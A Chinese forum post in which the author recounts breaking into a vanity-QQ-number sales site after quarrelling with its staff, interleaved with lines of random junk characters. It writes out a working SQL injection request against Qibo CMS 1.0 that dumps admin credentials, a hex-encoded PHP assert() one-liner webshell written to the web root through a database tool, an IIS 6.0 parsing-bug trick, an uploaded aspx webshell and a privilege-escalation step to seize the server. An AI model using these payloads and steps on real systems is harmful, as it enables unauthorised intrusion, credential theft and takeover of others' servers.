|
, x) q, B7 a) m' F# v% s
' U3 Y% S Z$ J- ^ c6 P7 ~$ h
1 T; M; A9 n+ U- S3 o: V+ {# [2 D R7 ~+ x0 ~ z
一、踩点寻找漏洞
0 _* Y7 I! O* c! N/ D, |) g
闲来无事,在各个QQ靓号群求买5位QQ,寻问半天无果就在百度搜索5位QQ扫号找到“目标”www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888,199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。
' E2 y# o9 ? u1 @5 K% h随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下:
8 }8 y8 c8 E6 ^先注册一个用户,记住注册时候的邮箱以uid号,
, W9 l* D. y% I) j8 f
/ M7 |, g# f3 e' o) d) W
% y! v( a3 Y- z& t9 ^4 m( g0 b然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下:
) G" w+ S6 i( R/ }$ l! S
6 M% p4 d; w. o' x# {
truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23
5 _6 \3 r0 B2 X: |3 ^, |) H( @
这里的email和uid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图:
. F2 }3 Z7 I3 {1 `% x
9 Z5 D s1 G% }, t# F" w& ~* d+ p确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23
) u( y4 _' t p8 ?
% f( l2 @6 G) X! k6 q/ R
* r; s$ A) X# D解密进后台如图:
2 ~" |* D9 U- X7 h) L. W
. b1 s" u- U$ s+ L5 f% o
3 V$ X1 a; g3 D* F& N5 Q2 z* U
8 y3 X1 S; y! c3 M! M二、后台getwebshell
- g j, [% g ^" y进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图:
+ Y1 Q( ?5 q5 T7 N
: ^* w3 M9 j! B; H4 D3 ]8 L
- a o3 ~: O) B0 i" `2 X
9 ]6 y# O( l+ ?0 T7 b1 T
然后点确定,添加提示
2 R& b5 F" R) v; b
5 }8 u- c9 @) N' v
' b$ E( z8 A3 j8 _
) S; w8 o8 ~$ N5 a. y8 R: O p
由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图:
) ~3 X- e7 P9 }+ @/ y
: N9 _) X0 r( I" e( m
, e& ?$ F4 p) k9 \( |1 q" o, [4 E改静态页面为help.php;.htm,然后我们发现访问help.php;.htm是404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下
& Z) ^7 n9 H4 y( \0 ?( B7 ]
如图:
9 o/ Q1 o1 y t9 Y1 v; S5 H
! S$ T, R9 P" b! C" m5 l2 Y
$ n3 Y1 a. u- x1 ^+ o* L
% W6 Z$ K* z4 `5 p/ Q1 s
之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开
* n2 `4 D% D& a( p% q4 D
# A% ?5 P, t, H* n0 V. U+ Y- p) w
( k" A9 F3 B% z$ y! g( H$ j
( Y: P& v- x2 \. f# U' F
三、提权进服务器
+ Z% X( o- `7 A: _$ w8 W, h0 ?
经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图:
2 y) t: O7 X" T: k
5 m8 I( L* a; O) m
/ T. _" h& W Y1 w; M
啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图:
; ^" ?( `9 D/ Z* x
0 ]) { Q) C q! f
7 ^) A8 Q$ n. E# I; @然后登陆服务器如图:
- Y2 t: e, ?* O; @! E9 r
4 N) V8 w+ f8 f: T' V* G8 S
! V$ p: V- S- \" {6 R( X # @" M% v/ x# o, G$ }
) R: M8 P6 U, `1 L1 D) \$ N5 ~' h
: i, G+ t+ H( B+ W0 T+ h6 x难怪普通刀连接不上,原来是有狗。
. E, e# \2 X: V/ ~( J$ m
: G9 @. ?* d+ V8 @; K/ }
0 P3 e. l$ z4 `: L- X& @( r
$ V8 [* E/ b' w( f
: L3 p1 ^& ]5 v. j0 P8 j% v
# n3 f' l5 I9 r
% K' P5 w8 [# A* A
| 
发表于 2018-10-20 20:08:47
收藏
支持
反对